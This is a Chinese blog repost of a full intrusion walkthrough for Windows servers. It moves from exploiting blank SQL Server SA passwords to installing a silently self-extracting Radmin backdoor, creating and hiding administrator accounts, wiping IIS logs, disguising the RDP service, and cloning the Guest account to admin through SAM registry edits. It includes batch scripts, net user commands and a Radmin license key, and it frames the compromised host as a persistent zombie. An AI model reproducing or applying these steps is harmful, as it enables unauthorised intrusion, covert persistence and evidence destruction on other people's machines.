侯体宗的博客
  • 首页
  • Hyperf版
  • beego仿版
  • 人生(杂谈)
  • 技术
  • 关于我
  • 更多分类
    • 文件下载
    • 文字修仙
    • 中国象棋ai
    • 群聊
    • 九宫格抽奖
    • 拼图
    • 消消乐
    • 相册

解析入侵3389的全部流程

技术  /  管理员 发布于 7年前   250

工具:

WINNTAutoAttack自动攻击器(扫漏洞);

SQLTOOLS(SA空口令连接器);

RAMDIN影子3.0中文版(远程控制程序)

RADMIN注册码: 

08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA 6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23

SC.exe port.bat query.exe quser.exe(隐藏3389服务及不让管理发现自己程序);CleanIISLog.exe(小榕的擦PP程序);

3389.exe(开3389端口服务的);

psu.exe(使用被禁止的Guest帐户要用到的);

mstsc.exe(远程桌面连接程序)。 

一.扫到SA弱口令(自动攻击器) 
二.用SQLTOOLS连上去建一个用户 

net start telnet 

开telnet服务

net user mint mint /add  

添加用户mint密码为

mint net localgroup administrators mint /add 

将帐号mint升级为管理员


三.上传后门程序RAD.EXE(RADMIN服务端自解压程序) 
制作RAD.EXE过程: 
1、到Radmin安装目录下找到AdmDll.dll、 raddrv.dll和r_sever.exe; 
2、在本地设置服务端(一定要生成); 
     设置密码-->>设置连接端口(默认4489)-->>生成 
3、导出注册表HKEY_LOCAL_MACHINE\\SYSTEM\\Radmin的键值为1.reg; 
4、编写一个批处理,并命名为u.bat; 

@echo offnet stop r_server 

5、写第二个批处理,r.bat,内容为: 

@echo [email protected] / 
uninstall /[email protected] /install /
silence@regedit /s 1.reg@echo [email protected] /uninstall /
[email protected] /install /silence@regedit /
s 1.reg@net start r_server@del 
rad.exe@del 1.reg@del r.bat@del u.bat

6、将AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat压缩成Rad.RAR压缩包; 
7、将Rad.rar制作成自解压文件; 
选择Default.sfx的自释放模块-->>高级自释放选项  -->>常规 
释放路径:

%systemroot%\\system32  

安装程序:

释放后运行:r.bat 

释放前运行u.bat 
-->>摸式 
缄默模式:全部隐藏 

覆盖方式:覆盖所有文件 
-->>确定-->>确定 
生成完成。 

四.用RADMIN客服端连接 
上传文件到c:\\WINNT(XP是windows): 
port.bat(如果是在XP下,这个要把里面的WINNT改为Windows) 

query.exe 
quser.exe 
SC.exe 
CleanIISLog.exe.exe 
3389.exe 
psu.exe 

最好再上传一个反弹后门RADMIN进入TELNET。 

运行c:\\winnt\\3389.exe,重启肉鸡。 

五.重启后用远程桌面远程器连上去  这里就有时会出现个问题。 
使用3389登陆,发现登陆用户已满,不用怕,我们把他踢出去。 
telnet对方ip,发现需要 NTLM 身份验证。

我们在自己的电脑里建立一个帐号mint密码为mint身份为管理员。 
找到c:\\winnt\\system32\\cmd.exe 建立一个快捷方式到桌面。

修改cmd的快捷方式属性为允许其他身份登陆。

然后运行桌面上的cmd.exe的快捷方式。

输入帐号mint密码mint,telnet对方ip,直接可以登陆对方电脑了。 

使用命令: 

c:\\query user (查看对方目前终端登陆状况。)  

运行命令: 

c:\\logoff 1(踢出去一个管理者)  

再用c:\\query user检查一便~~(这就是为什么不马上用1.bat了) 

六.连上后..

在cmd下运行 

c:\\winnt\\log . 自己的IP .(擦PP)  
c:\\winnet\\1.bat (删除覆盖查看当前在线用户文件) 


七.打SA空口令补丁 
程序-->>Microsoft SQL Server-->>查询分析器(有放大镜的) 
-->>Windowst身位验证登陆 
复制一下代码:SELMIS 

if exists (select * from dbo.sysobjects where id  
= object_id(N\'[dbo].[xp_cmdshell]\')
and OBJECTPROPERTY(id, N\'IsExtendedProc\') 
= 1) exec sp_dropextendedproc N\'[dbo].[xp_cmdshell]\'GO

按F5(运行),关了退出SQL Server再用SQL Server身位验证进一次,退出(这是为了不留下记录)。 

八.改3389端口和服务名称 
修改服务器端的端口设置,注册表有2个地方需要修改。 

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp],

PortNumber值,默认是3389,选择10进制,修改成所希望的端口,比如1314。  

第二个地方: 

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 

PortNumber值,默认是3389,选择10进制,修改成所希望的端口,比如1314。 
要重启系统才能用新端口连。(不急..改了他的服务名再重启系统吧) 
导出3389服务的 

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermService]  

的键值为mm.reg文件。

编辑mm.reg文件,替换TermService为Alerter(错误警告服务..别的服务也行) 。

再把第十行的"Description"="(这里是服务说明,改为你所换的服务说明,这里改为通知所选用户和计算机有关系统管理级警报。)"

第十一行的"DisplayName"="(这里是服务名称,改为你所换的服务名称,这里改为Alerter)。

保存,再导入注册表(这里要先运行Services.msc(可在CMD下打这命令)服务管理器..

把Alerter的服务先停止)。 

再在CMD下 

CD c:\\winnt\\system32 copy termsrv.exe service.exe 

(这里是复制termsrv.exe为Alerter服务文件名差不多的文件)

CD C:\\winnt sc \\\\127.0.0.1 config Alerter binpath=c:\\winnt\\system32\\service.exe 

(这里是从新定向Alerter服务文件.服务名一定要区分大小写A要大写)

九.注消后(注消比直接关要好些)用Radmin重启肉鸡 
十.使用被禁用的帐户[Guest]登陆,删除自己开始建的帐号 
1.使用psu.exe展开注册表到 

HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users  

用法:[psu -p regedit -i pid] 
Pid 的值为在任务栏空白处点右键-->>任务管理器--->>进程中的winlogon.exe

后面的数值就是PID数值。  如:psu Cp regedit Ci 157 

将Guest克成管理员权限,克成管理员权限的方法: 
找到

HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\\Administrator

  的类型值。

在HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\

下找到这个类型值在复制数值名为F的数值数剧覆盖相应的Guest的类型值(找的方法一样)。 
导出Guest的配置(也就是导出

HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Guest

和他相应的类型值的数据),然后删除Guest的配置。 

2.查看计算机管理中帐户列表,刷新这时候会出现错误[找不到帐户](跳过这步也行)。 
3.将Guest的配置(二个REG文件导进注册表)。 
4.修改Guest帐户密码,命令行下禁用Guest帐户[一定是命令行下]。 

net user Guest ****  

[修改密码]

net user Guest / active:yesnet user Guest /active:no

[命令行下禁用Guest]

5.实验被禁止的帐户Guest是否可用。 
6.用Guest登陆后删除自己建的帐号。 

net user mint /del 

整个过程结束。 

最后最好把RADMIN的服务也改了,多留个后门多条路,呵呵。

整个过程全部结束,这机子就真正变成你的肉鸡了。


  • 上一条:
    如何禁止指定指定IP访问我的计算机
    下一条:
    2006年100款最佳安全工具谱第1/4页
  • 昵称:

    邮箱:

    0条评论 (评论内容有缓存机制,请悉知!)
    最新最热
    • 分类目录
    • 人生(杂谈)
    • 技术
    • linux
    • Java
    • php
    • 框架(架构)
    • 前端
    • ThinkPHP
    • 数据库
    • 微信(小程序)
    • Laravel
    • Redis
    • Docker
    • Go
    • swoole
    • Windows
    • Python
    • 苹果(mac/ios)
    • 相关文章
    • gmail发邮件报错:534 5.7.9 Application-specific password required...解决方案(0个评论)
    • 2024.07.09日OpenAI将终止对中国等国家和地区API服务(0个评论)
    • 2024/6/9最新免费公益节点SSR/V2ray/Shadowrocket/Clash节点分享|科学上网|免费梯子(0个评论)
    • 国外服务器实现api.openai.com反代nginx配置(0个评论)
    • 2024/4/28最新免费公益节点SSR/V2ray/Shadowrocket/Clash节点分享|科学上网|免费梯子(0个评论)
    • 近期文章
    • 在go语言中使用api.geonames.org接口实现根据国际邮政编码获取地址信息功能(1个评论)
    • 在go语言中使用github.com/signintech/gopdf实现生成pdf分页文件功能(0个评论)
    • gmail发邮件报错:534 5.7.9 Application-specific password required...解决方案(0个评论)
    • 欧盟关于强迫劳动的规定的官方举报渠道及官方举报网站(0个评论)
    • 在go语言中使用github.com/signintech/gopdf实现生成pdf文件功能(0个评论)
    • Laravel从Accel获得5700万美元A轮融资(0个评论)
    • 在go + gin中gorm实现指定搜索/区间搜索分页列表功能接口实例(0个评论)
    • 在go语言中实现IP/CIDR的ip和netmask互转及IP段形式互转及ip是否存在IP/CIDR(0个评论)
    • PHP 8.4 Alpha 1现已发布!(0个评论)
    • Laravel 11.15版本发布 - Eloquent Builder中添加的泛型(0个评论)
    • 近期评论
    • 122 在

      学历:一种延缓就业设计,生活需求下的权衡之选中评论 工作几年后,报名考研了,到现在还没认真学习备考,迷茫中。作为一名北漂互联网打工人..
    • 123 在

      Clash for Windows作者删库跑路了,github已404中评论 按理说只要你在国内,所有的流量进出都在监控范围内,不管你怎么隐藏也没用,想搞你分..
    • 原梓番博客 在

      在Laravel框架中使用模型Model分表最简单的方法中评论 好久好久都没看友情链接申请了,今天刚看,已经添加。..
    • 博主 在

      佛跳墙vpn软件不会用?上不了网?佛跳墙vpn常见问题以及解决办法中评论 @1111老铁这个不行了,可以看看近期评论的其他文章..
    • 1111 在

      佛跳墙vpn软件不会用?上不了网?佛跳墙vpn常见问题以及解决办法中评论 网站不能打开,博主百忙中能否发个APP下载链接,佛跳墙或极光..
    • 2016-10
    • 2016-11
    • 2017-07
    • 2017-08
    • 2017-09
    • 2018-01
    • 2018-07
    • 2018-08
    • 2018-09
    • 2018-12
    • 2019-01
    • 2019-02
    • 2019-03
    • 2019-04
    • 2019-05
    • 2019-06
    • 2019-07
    • 2019-08
    • 2019-09
    • 2019-10
    • 2019-11
    • 2019-12
    • 2020-01
    • 2020-03
    • 2020-04
    • 2020-05
    • 2020-06
    • 2020-07
    • 2020-08
    • 2020-09
    • 2020-10
    • 2020-11
    • 2021-04
    • 2021-05
    • 2021-06
    • 2021-07
    • 2021-08
    • 2021-09
    • 2021-10
    • 2021-12
    • 2022-01
    • 2022-02
    • 2022-03
    • 2022-04
    • 2022-05
    • 2022-06
    • 2022-07
    • 2022-08
    • 2022-09
    • 2022-10
    • 2022-11
    • 2022-12
    • 2023-01
    • 2023-02
    • 2023-03
    • 2023-04
    • 2023-05
    • 2023-06
    • 2023-07
    • 2023-08
    • 2023-09
    • 2023-10
    • 2023-12
    • 2024-02
    • 2024-04
    • 2024-05
    • 2024-06
    • 2025-02
    Top

    Copyright·© 2019 侯体宗版权所有· 粤ICP备20027696号 PHP交流群

    侯体宗的博客